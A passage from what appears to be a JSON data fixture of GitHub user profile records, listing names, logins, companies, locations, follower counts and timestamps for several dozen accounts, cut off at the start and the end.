"markjeffreymiller", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/3987788?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2013-03-27T18:11:42Z", + "updated_at": "2024-04-13T05:09:45Z", + "node_id": "MDQ6VXNlcjM5ODc3ODg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1404, + "fields": { + "nest_created_at": "2024-09-11T23:24:42.893Z", + "nest_updated_at": "2024-09-11T23:24:42.893Z", + "name": "Stefan", + "login": "stefan-g", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/20639060?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2016-07-25T09:23:58Z", + "updated_at": "2024-09-01T11:34:41Z", + "node_id": "MDQ6VXNlcjIwNjM5MDYw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1405, + "fields": { + "nest_created_at": "2024-09-11T23:24:44.105Z", + "nest_updated_at": "2024-09-11T23:24:44.105Z", + "name": "Tyler Crawford", + "login": "tcrawford-figure", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/91682066?v=4", + "company": "@FigureTechnologies", + "location": "PA, USA", + "collaborators_count": 0, + "following_count": 53, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 15, + "created_at": "2021-09-30T14:38:09Z", + "updated_at": "2024-09-04T00:11:09Z", + "node_id": "U_kgDOBXb1Eg", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1406, + "fields": { + "nest_created_at": "2024-09-11T23:24:45.770Z", + "nest_updated_at": "2024-09-11T23:27:42.213Z", + "name": "", + "login": "wzd-hash", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/59039445?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2019-12-19T03:08:36Z", + "updated_at": "2024-09-03T06:32:15Z", + "node_id": "MDQ6VXNlcjU5MDM5NDQ1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1407, + "fields": { + "nest_created_at": "2024-09-11T23:24:46.998Z", + "nest_updated_at": "2024-09-11T23:24:46.998Z", + "name": "", + "login": "37IulianPopovici", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/136596702?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2023-06-14T12:03:58Z", + "updated_at": "2024-08-20T10:13:00Z", + "node_id": "U_kgDOCCRM3g", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1408, + "fields": { + "nest_created_at": "2024-09-11T23:24:52.002Z", + "nest_updated_at": "2024-09-11T23:24:52.002Z", + "name": "", + "login": "vishal-singh3", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/116781907?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2022-10-27T04:27:08Z", + "updated_at": "2024-07-23T07:33:16Z", + "node_id": "U_kgDOBvXzUw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1409, + "fields": { + "nest_created_at": "2024-09-11T23:24:53.682Z", + "nest_updated_at": "2024-09-11T23:24:53.682Z", + "name": "Johan Blomgren", + "login": "blommish", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/937168?v=4", + "company": "", + "location": "Oslo, Norway", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 7, + "public_gists_count": 0, + "public_repositories_count": 10, + "created_at": "2011-07-25T12:26:35Z", + "updated_at": "2024-05-10T06:32:10Z", + "node_id": "MDQ6VXNlcjkzNzE2OA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1410, + "fields": { + "nest_created_at": "2024-09-11T23:24:55.009Z", + "nest_updated_at": "2024-09-11T23:24:55.009Z", + "name": "Philip Reiner Kensche", + "login": "vinjana", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/275224?v=4", + "company": "German Cancer Research Center", + "location": "Heidelberg", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 22, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2010-05-13T07:59:58Z", + "updated_at": "2024-05-21T13:35:20Z", + "node_id": "MDQ6VXNlcjI3NTIyNA==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1411, + "fields": { + "nest_created_at": "2024-09-11T23:24:57.553Z", + "nest_updated_at": "2024-09-11T23:24:57.553Z", + "name": "", + "login": "Andreas-Hujber", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/77403904?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 0, + "created_at": "2021-01-13T16:39:48Z", + "updated_at": "2024-09-09T11:17:03Z", + "node_id": "MDQ6VXNlcjc3NDAzOTA0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1412, + "fields": { + "nest_created_at": "2024-09-11T23:25:02.705Z", + "nest_updated_at": "2024-09-11T23:25:02.705Z", + "name": "Michaël Lefèvre", + "login": "lefevre00", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/13120878?v=4", + "company": "Itk", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2015-06-30T15:19:36Z", + "updated_at": "2024-05-30T17:02:47Z", + "node_id": "MDQ6VXNlcjEzMTIwODc4", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1413, + "fields": { + "nest_created_at": "2024-09-11T23:25:03.923Z", + "nest_updated_at": "2024-09-22T18:46:58.322Z", + "name": "Thomas", + "login": "ThomGeG", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16097487?v=4", + "company": "", + "location": "Sydney, Australia", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 17, + "created_at": "2015-12-01T09:01:53Z", + "updated_at": "2024-04-30T06:36:12Z", + "node_id": "MDQ6VXNlcjE2MDk3NDg3", + "bio": "Just a nerd programming dumb stuff.", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1414, + "fields": { + "nest_created_at": "2024-09-11T23:25:05.195Z", + "nest_updated_at": "2024-09-22T18:46:27.746Z", + "name": "blatobi", + "login": "blatobi", + "email": "tobias.blaschke@payfree.io", + "avatar_url": "https://avatars.githubusercontent.com/u/65171481?v=4", + "company": "", + "location": "Magdeburg, Germany", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2020-05-11T12:52:41Z", + "updated_at": "2024-09-18T12:08:50Z", + "node_id": "MDQ6VXNlcjY1MTcxNDgx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1415, + "fields": { + "nest_created_at": "2024-09-11T23:25:06.408Z", + "nest_updated_at": "2024-09-18T18:57:04.264Z", + "name": "Gabriele", + "login": "aeroxr1", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6518523?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 6, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 22, + "created_at": "2014-01-27T21:03:44Z", + "updated_at": "2023-08-23T16:05:41Z", + "node_id": "MDQ6VXNlcjY1MTg1MjM=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1416, + "fields": { + "nest_created_at": "2024-09-11T23:25:09.783Z", + "nest_updated_at": "2024-09-22T18:46:29.920Z", + "name": "Guillaume Le Floch", + "login": "glefloch", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1827790?v=4", + "company": "Zenika", + "location": "Niort, France", + "collaborators_count": 0, + "following_count": 140, + "followers_count": 41, + "public_gists_count": 1, + "public_repositories_count": 62, + "created_at": "2012-06-07T17:23:11Z", + "updated_at": "2024-08-07T07:28:21Z", + "node_id": "MDQ6VXNlcjE4Mjc3OTA=", + "bio": "Tech Lead", + "is_hireable": true, + "twitter_username": "glfloch" + } +}, +{ + "model": "github.user", + "pk": 1417, + "fields": { + "nest_created_at": "2024-09-11T23:25:29.798Z", + "nest_updated_at": "2024-09-22T19:42:10.037Z", + "name": "David J. M. Karlsen", + "login": "davidkarlsen", + "email": "david@davidkarlsen.com", + "avatar_url": "https://avatars.githubusercontent.com/u/18299?v=4", + "company": "davidkarlsen.com", + "location": "Bergen, Norway", + "collaborators_count": 0, + "following_count": 49, + "followers_count": 165, + "public_gists_count": 8, + "public_repositories_count": 215, + "created_at": "2008-07-24T18:50:00Z", + "updated_at": "2024-08-28T11:20:09Z", + "node_id": "MDQ6VXNlcjE4Mjk5", + "bio": "Enterprise architecture, cloud-native, k8s, public-cloud, terraform.", + "is_hireable": true, + "twitter_username": "davidkarlsen" + } +}, +{ + "model": "github.user", + "pk": 1418, + "fields": { + "nest_created_at": "2024-09-11T23:25:41.681Z", + "nest_updated_at": "2024-09-11T23:25:41.681Z", + "name": "Camille Drapier", + "login": "CamilleDrapier", + "email": "camille.drapier@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/13419648?v=4", + "company": "Allm", + "location": "Tokyo", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 7, + "public_gists_count": 1, + "public_repositories_count": 25, + "created_at": "2015-07-20T14:49:28Z", + "updated_at": "2024-05-03T09:11:33Z", + "node_id": "MDQ6VXNlcjEzNDE5NjQ4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1419, + "fields": { + "nest_created_at": "2024-09-11T23:26:58.167Z", + "nest_updated_at": "2024-09-11T23:26:58.167Z", + "name": "Kevin O'Neal", + "login": "Scuilion", + "email": "oneal.kevin@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/241151?v=4", + "company": "", + "location": "Dallas, TX", + "collaborators_count": 0, + "following_count": 32, + "followers_count": 23, + "public_gists_count": 13, + "public_repositories_count": 60, + "created_at": "2010-04-10T18:33:50Z", + "updated_at": "2024-09-05T19:45:15Z", + "node_id": "MDQ6VXNlcjI0MTE1MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "Scuilion" + } +}, +{ + "model": "github.user", + "pk": 1420, + "fields": { + "nest_created_at": "2024-09-11T23:26:59.008Z", + "nest_updated_at": "2024-09-11T23:26:59.008Z", + "name": "", + "login": "vielfarbig", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/66375686?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2020-06-03T15:06:53Z", + "updated_at": "2024-07-02T16:27:16Z", + "node_id": "MDQ6VXNlcjY2Mzc1Njg2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1421, + "fields": { + "nest_created_at": "2024-09-11T23:26:59.829Z", + "nest_updated_at": "2024-09-11T23:26:59.830Z", + "name": "", + "login": "sify21", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11829223?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 23, + "followers_count": 11, + "public_gists_count": 10, + "public_repositories_count": 67, + "created_at": "2015-04-07T04:46:08Z", + "updated_at": "2024-08-24T11:28:16Z", + "node_id": "MDQ6VXNlcjExODI5MjIz", + "bio": "vim enthusiast", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1422, + "fields": { + "nest_created_at": "2024-09-11T23:27:00.686Z", + "nest_updated_at": "2024-09-13T05:17:54.160Z", + "name": "", + "login": "sdd4181", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/69910407?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2020-08-19T14:35:55Z", + "updated_at": "2024-08-03T02:03:35Z", + "node_id": "MDQ6VXNlcjY5OTEwNDA3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1423, + "fields": { + "nest_created_at": "2024-09-11T23:27:05.985Z", + "nest_updated_at": "2024-09-12T01:23:31.279Z", + "name": "", + "login": "mathuriga", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/11587426?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 19, + "created_at": "2015-03-21T16:22:50Z", + "updated_at": "2024-08-11T11:27:52Z", + "node_id": "MDQ6VXNlcjExNTg3NDI2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1424, + "fields": { + "nest_created_at": "2024-09-11T23:27:07.283Z", + "nest_updated_at": "2024-09-12T01:22:52.404Z", + "name": "Johan Karlberg", + "login": "wlfshmn", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1498204?v=4", + "company": "", + "location": "Gothenburg, Sweden", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 3, + "created_at": "2012-03-04T01:03:39Z", + "updated_at": "2024-04-09T13:12:16Z", + "node_id": "MDQ6VXNlcjE0OTgyMDQ=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1425, + "fields": { + "nest_created_at": "2024-09-11T23:27:08.221Z", + "nest_updated_at": "2024-09-11T23:27:08.221Z", + "name": "Larry Mota--Lavigne", + "login": "LarryMotaLavigne", + "email": "larry.motalavigne@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/9347622?v=4", + "company": "ATOM Studios", + "location": "Tours, France", + "collaborators_count": 0, + "following_count": 19, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 18, + "created_at": "2014-10-22T07:08:22Z", + "updated_at": "2024-08-21T11:24:55Z", + "node_id": "MDQ6VXNlcjkzNDc2MjI=", + "bio": "💻️ 🐈️ 🎸 🇫🇷 ✈️", + "is_hireable": false, + "twitter_username": "LarryMotaL" + } +}, +{ + "model": "github.user", + "pk": 1426, + "fields": { + "nest_created_at": "2024-09-11T23:27:10.001Z", + "nest_updated_at": "2024-09-11T23:27:10.001Z", + "name": "Wim Vandenhaute", + "login": "wvdhaute", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/765069?v=4", + "company": "", + "location": "Waregem, Belgium", + "collaborators_count": 0, + "following_count": 11, + "followers_count": 6, + "public_gists_count": 3, + "public_repositories_count": 9, + "created_at": "2011-05-03T06:56:54Z", + "updated_at": "2024-08-27T07:03:39Z", + "node_id": "MDQ6VXNlcjc2NTA2OQ==", + "bio": "", + "is_hireable": true, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1427, + "fields": { + "nest_created_at": "2024-09-11T23:27:12.038Z", + "nest_updated_at": "2024-09-11T23:27:12.038Z", + "name": "", + "login": "emilgenchev", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15820430?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-11-12T16:53:40Z", + "updated_at": "2024-06-22T18:40:28Z", + "node_id": "MDQ6VXNlcjE1ODIwNDMw", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1428, + "fields": { + "nest_created_at": "2024-09-11T23:27:13.281Z", + "nest_updated_at": "2024-09-22T18:47:01.223Z", + "name": "Mirko Friedenhagen", + "login": "mfriedenhagen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/125281?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 68, + "public_gists_count": 6, + "public_repositories_count": 145, + "created_at": "2009-09-10T09:46:32Z", + "updated_at": "2024-09-17T09:32:35Z", + "node_id": "MDQ6VXNlcjEyNTI4MQ==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1429, + "fields": { + "nest_created_at": "2024-09-11T23:27:14.100Z", + "nest_updated_at": "2024-09-11T23:27:14.100Z", + "name": "", + "login": "richardTingle", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6330028?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2014-01-06T13:09:52Z", + "updated_at": "2024-01-01T10:43:00Z", + "node_id": "MDQ6VXNlcjYzMzAwMjg=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1430, + "fields": { + "nest_created_at": "2024-09-11T23:27:15.764Z", + "nest_updated_at": "2024-09-11T23:27:16.621Z", + "name": "", + "login": "Swapnil-CSI", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/87305526?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2021-07-12T09:13:26Z", + "updated_at": "2024-01-23T07:00:37Z", + "node_id": "MDQ6VXNlcjg3MzA1NTI2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1431, + "fields": { + "nest_created_at": "2024-09-11T23:27:18.372Z", + "nest_updated_at": "2024-09-11T23:27:18.372Z", + "name": "toaomalkster", + "login": "toaomalkster", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12741661?v=4", + "company": "", + "location": "Chennai, India", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2015-06-04T04:01:37Z", + "updated_at": "2024-08-28T11:37:06Z", + "node_id": "MDQ6VXNlcjEyNzQxNjYx", + "bio": "Software Engineer. In my spare time I study Consciousness from a scientific point of view.\r\n\r\nPreviously based in Wellington, New Zealand.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1432, + "fields": { + "nest_created_at": "2024-09-11T23:27:19.239Z", + "nest_updated_at": "2024-09-12T01:12:42.618Z", + "name": "", + "login": "ludan-nin", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/84755351?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 9, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2021-05-25T01:51:31Z", + "updated_at": "2024-04-15T07:14:36Z", + "node_id": "MDQ6VXNlcjg0NzU1MzUx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1433, + "fields": { + "nest_created_at": "2024-09-11T23:27:20.074Z", + "nest_updated_at": "2024-09-11T23:27:20.912Z", + "name": "Bruce Coveny", + "login": "bcoveny", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/8987322?v=4", + "company": "", + "location": "Sauquiot, NY", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 2, + "created_at": "2014-10-01T17:07:12Z", + "updated_at": "2024-08-08T10:08:55Z", + "node_id": "MDQ6VXNlcjg5ODczMjI=", + "bio": "", + "is_hireable": false, + "twitter_username": "bruce_coveny" + } +}, +{ + "model": "github.user", + "pk": 1434, + "fields": { + "nest_created_at": "2024-09-11T23:27:22.198Z", + "nest_updated_at": "2024-09-22T19:42:24.002Z", + "name": "Abdel Hajou", + "login": "AbdelHajou", + "email": "abdelwhajou@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/62144407?v=4", + "company": "Info Support", + "location": "Veenendaal, The Netherlands", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 21, + "created_at": "2020-03-13T13:43:35Z", + "updated_at": "2024-09-01T12:06:30Z", + "node_id": "MDQ6VXNlcjYyMTQ0NDA3", + "bio": "IT Consultant at Info Support", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1435, + "fields": { + "nest_created_at": "2024-09-11T23:27:23.040Z", + "nest_updated_at": "2024-09-11T23:27:23.040Z", + "name": "XenoAmess", + "login": "XenoAmess", + "email": "xenoamess@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/17455337?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 84, + "followers_count": 128, + "public_gists_count": 0, + "public_repositories_count": 67, + "created_at": "2016-02-24T15:16:56Z", + "updated_at": "2024-09-08T01:13:07Z", + "node_id": "MDQ6VXNlcjE3NDU1MzM3", + "bio": "I get to know the missing of comments and documents can be really harmful recently, and I would find some time to add more detailed comments to my projects.THX.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1436, + "fields": { + "nest_created_at": "2024-09-11T23:27:23.841Z", + "nest_updated_at": "2024-09-11T23:27:23.841Z", + "name": "Brad Giaccio", + "login": "bgiaccio", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/12596046?v=4", + "company": "@Berico-Technologies", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 3, + "public_repositories_count": 6, + "created_at": "2015-05-25T12:27:05Z", + "updated_at": "2024-07-31T14:12:14Z", + "node_id": "MDQ6VXNlcjEyNTk2MDQ2", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1437, + "fields": { + "nest_created_at": "2024-09-11T23:27:24.657Z", + "nest_updated_at": "2024-09-11T23:27:24.657Z", + "name": "Jörg Hohwiller", + "login": "hohwille", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1923119?v=4", + "company": "", + "location": "Germany", + "collaborators_count": 0, + "following_count": 32, + "followers_count": 42, + "public_gists_count": 2, + "public_repositories_count": 42, + "created_at": "2012-07-04T18:47:24Z", + "updated_at": "2024-08-20T11:24:00Z", + "node_id": "MDQ6VXNlcjE5MjMxMTk=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1438, + "fields": { + "nest_created_at": "2024-09-11T23:27:25.515Z", + "nest_updated_at": "2024-09-22T19:40:35.861Z", + "name": "Martin Husted Hartvig", + "login": "HagarJNode", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2697227?v=4", + "company": "", + "location": "Denmark", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2012-11-01T07:56:58Z", + "updated_at": "2024-08-29T08:20:18Z", + "node_id": "MDQ6VXNlcjI2OTcyMjc=", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1439, + "fields": { + "nest_created_at": "2024-09-11T23:27:26.351Z", + "nest_updated_at": "2024-09-11T23:27:26.352Z", + "name": "Carsten Rohde", + "login": "caroso-de", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/15255111?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 2, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2015-10-22T21:28:04Z", + "updated_at": "2024-07-09T12:20:48Z", + "node_id": "MDQ6VXNlcjE1MjU1MTEx", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1440, + "fields": { + "nest_created_at": "2024-09-11T23:27:27.153Z", + "nest_updated_at": "2024-09-22T19:29:14.446Z", + "name": "mergebase.com", + "login": "juliusmusseau", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/41974443?v=4", + "company": "Mergebase", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2018-07-31T23:03:30Z", + "updated_at": "2024-09-02T21:09:12Z", + "node_id": "MDQ6VXNlcjQxOTc0NDQz", + "bio": "Securing software supply chains!", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1441, + "fields": { + "nest_created_at": "2024-09-11T23:27:27.986Z", + "nest_updated_at": "2024-09-11T23:27:27.986Z", + "name": "", + "login": "tobinbrooke", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51296294?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2019-06-02T17:02:49Z", + "updated_at": "2024-02-22T19:47:15Z", + "node_id": "MDQ6VXNlcjUxMjk2Mjk0", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1442, + "fields": { + "nest_created_at": "2024-09-11T23:27:28.813Z", + "nest_updated_at": "2024-09-11T23:27:28.813Z", + "name": "Roman Huber", + "login": "alerosmile", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/26764588?v=4", + "company": "", + "location": "St. Margrethen, Switzerland", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 5, + "created_at": "2017-03-29T09:58:10Z", + "updated_at": "2024-07-14T19:20:42Z", + "node_id": "MDQ6VXNlcjI2NzY0NTg4", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1443, + "fields": { + "nest_created_at": "2024-09-11T23:27:32.157Z", + "nest_updated_at": "2024-09-12T01:42:31.662Z", + "name": "", + "login": "redaabdellah21", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43956285?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 14, + "created_at": "2018-10-08T11:13:58Z", + "updated_at": "2023-09-10T11:44:55Z", + "node_id": "MDQ6VXNlcjQzOTU2Mjg1", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1444, + "fields": { + "nest_created_at": "2024-09-11T23:27:32.991Z", + "nest_updated_at": "2024-09-11T23:27:32.991Z", + "name": "Josua", + "login": "SemmelJochen", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/43446941?v=4", + "company": "", + "location": "Münster, Germany", + "collaborators_count": 0, + "following_count": 3, + "followers_count": 4, + "public_gists_count": 0, + "public_repositories_count": 16, + "created_at": "2018-09-20T15:14:23Z", + "updated_at": "2024-08-22T09:01:07Z", + "node_id": "MDQ6VXNlcjQzNDQ2OTQx", + "bio": "coding from home", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1445, + "fields": { + "nest_created_at": "2024-09-11T23:27:33.829Z", + "nest_updated_at": "2024-09-11T23:27:33.829Z", + "name": "Anders Båtstrand", + "login": "anderius", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/917734?v=4", + "company": "Anders Båtstrand AS", + "location": "Tønsberg", + "collaborators_count": 0, + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 6, + "created_at": "2011-07-15T13:43:33Z", + "updated_at": "2023-08-16T11:36:47Z", + "node_id": "MDQ6VXNlcjkxNzczNA==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1446, + "fields": { + "nest_created_at": "2024-09-11T23:27:34.671Z", + "nest_updated_at": "2024-09-22T15:32:46.560Z", + "name": "Henrik Plate", + "login": "henrikplate", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/17928867?v=4", + "company": "@endorlabs ", + "location": "France", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 15, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2016-03-18T13:40:42Z", + "updated_at": "2024-08-22T07:38:47Z", + "node_id": "MDQ6VXNlcjE3OTI4ODY3", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1447, + "fields": { + "nest_created_at": "2024-09-11T23:27:37.262Z", + "nest_updated_at": "2024-09-22T18:46:57.674Z", + "name": "Kevin Conner", + "login": "knrc", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/701297?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 25, + "public_gists_count": 4, + "public_repositories_count": 126, + "created_at": "2011-03-31T10:29:06Z", + "updated_at": "2024-09-21T11:23:23Z", + "node_id": "MDQ6VXNlcjcwMTI5Nw==", + "bio": "", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 1448, + "fields": { + "nest_created_at": "2024-09-11T23:27:38.919Z", + "nest_updated_at": "2024-09-11T23:27:38.919Z", + "name": "Pascal Groß", + "login": "interN3rd", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/44261334?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 2, + "followers_count": 1, + "public_gists_count": 0, + "public_repositories_count": 